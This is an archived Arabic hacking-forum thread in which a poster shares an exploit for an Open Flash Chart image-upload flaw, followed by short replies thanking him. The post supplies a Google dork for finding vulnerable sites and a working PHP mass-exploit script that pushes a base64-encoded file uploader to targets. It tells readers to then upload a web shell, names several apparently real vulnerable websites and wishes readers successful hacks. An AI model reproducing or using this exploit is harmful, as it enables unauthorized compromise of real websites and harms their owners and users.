المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : حصريا على جيوش الهكرز Remote Code Execution


Cyb3Rm0uJah3D
11-20-2013, 11:34 PM
http://img72.imageshack.us/img72/2643/106jats.png
http://sl.glitter-graphics.net/pub/1255/1255941epn0xj7g4i.gif

السلام عليكم ورحمة الله وبركاته
الحمد لله والصلاة والسلام على رسول الله ، وعلى آله وصحبه ومن اتبع هداه ، أما بعد :
http://img87.imageshack.us/img87/1498/913e588354hs6gi8.png

من إكتشافي: ثغرة Remote Code Execution في العديد من السكربتات
http://img87.imageshack.us/img87/1498/913e588354hs6gi8.png

الشـــرح
http://sl.glitter-graphics.net/pub/1255/1255941epn0xj7g4i.gif

نضع الدرك في محرك البحث google


intitle:Index of /tmp-upload-images/

أنا إخترت هذا الموقع (مسار التخزين المؤقت للصور)


http://hot-cs.net/lime/limewizard/_scripts/openflashchart/tmp-upload-images/

http://up.phphost.biz/images/14948690464418749336.png

نذهب لهذا المسار (مسار التحميل)


http://hot-cs.net/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php

تظهر لنا هذه الرسالة لتؤكد لنا أن الموقع مصاب


Saving your image to: ../tmp-upload-images/

http://up.phphost.biz/images/69662274649270753770.png

نضع هذه المسارات في السكربت php التالي


<form method='POST'>
<center>
<input type='text' name='name' value='cyb.php'>
<input type='submit' value='OK' name='OK'><br><br>
<textarea name='situs' cols='45' rows='1'>http://target.com/</textarea>
</center>
</form>
<?
@set_time_limit(0);
$site = explode("\r\n", $_POST['situs']);
$namafile = $_POST['name'];
$path = array('/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php');

$nama = array("/lime/limewizard/_scripts/openflashchart/tmp-upload-images/");

$uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgfCBjeW IucGhwPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIi IG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm 0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+ JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaW xlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9 InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm 9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQi ICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX2 5hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVj aG8gJzxiPlVwbG9hZCBzdWNjZXNzISEhPC9iPjxicj48YnI+Jz sgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgZmFpbGVkICEh ITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");

$options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
$context = stream_context_create($options);

if($_POST['OK'])
{
foreach($site as $situs)
{
foreach($path as $upload)
{
$fopen = @fopen("{$situs}{$upload}?name={$namafile}", 'r', false, $context);
}
foreach($nama as $namas)
{
$url = "{$situs}{$namas}{$namafile}";
$check = @file_get_contents($url);
if(eregi("cyb.php", $check))
{
echo "<center><font face='Tahoma' color='Green' size='2'>[+] Exploit success => {$situs}/{$namas}/{$namafile} <br /></center>";
flush();
}
}
}
}
echo "<center><font face='Tahoma' color='Red' size='2'>[+] coded by Cyb3Rm0uJah3D</font></center>";
?>

http://up.phphost.biz/images/29462972201142043634.png

نستعرض هذا السكربت على سرفر شخصي أو على سرفر سبق إختراقه

http://up.phphost.biz/images/60723870965954446096.png

نضع رابط الموقع في المستطيل كما في الصورة ثم نضغط OK فنتحصل على رابط ملف التحميل cyb.php

http://up.phphost.biz/images/59394082581920202036.png

نستعرض الملف cyb.php ثم نرفع الشل في نفس المسار

http://up.phphost.biz/images/82569415450275476617.png

http://up.phphost.biz/images/55746221497605970698.png

هذه بعض المواقع مصابة يمكن تطبيق الثغرة عليها

http://web.kdz.eu/sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/
http://www.hastingsvoluntaryaction.org/sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/
http://www.webstatus.designvault.co.in/libs/open-flash-chart/tmp-upload-images/
http://www.adcc.asn.au/main/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/

ختاما، أتمنى لكم إختراقات موفقة

ردودكم تهمني

http://img828.imageshack.us/img828/8025/jhghgfgh254.gif
اعمل معروف333
11-21-2013, 12:27 AM
شكرا جزيلااا
http://www.freeimagehost.info/files/img/user_uploads/displayimage.php?id=hm7yekwc11g1619525.gif
dark prince
11-21-2013, 01:51 AM
مشكور للطرح
واصل ابداعك
Jordan Ghost
11-21-2013, 10:52 AM
والله بطل مشكور
shhaby
11-21-2013, 06:26 PM
http://img519.imageshack.us/img519/838/df960bc9d81wm2.gif
boda_hackr
11-27-2013, 03:21 AM
بطل مشاء الله عليك فى تقدم اخى
mixdox
12-01-2013, 07:24 PM
مشكووووووووووور
zouhaire
12-01-2013, 08:55 PM
شكراااااااا على الطرح واصل ...
Iraqe Hacker
12-01-2013, 09:33 PM
بارك الله فيك اخي مبدع
mohtasim
12-02-2013, 07:25 PM
lمشاء الله عليك روعه يبطل
farissi mohssin
12-02-2013, 08:38 PM
بـــارك اللــــــــــــــــــــــ ــه فيــــــــــــك أخــــي
كاسر المشاعر
12-02-2013, 09:43 PM
http://www.samysoft.net/forumim/shokr/2/80898296.gif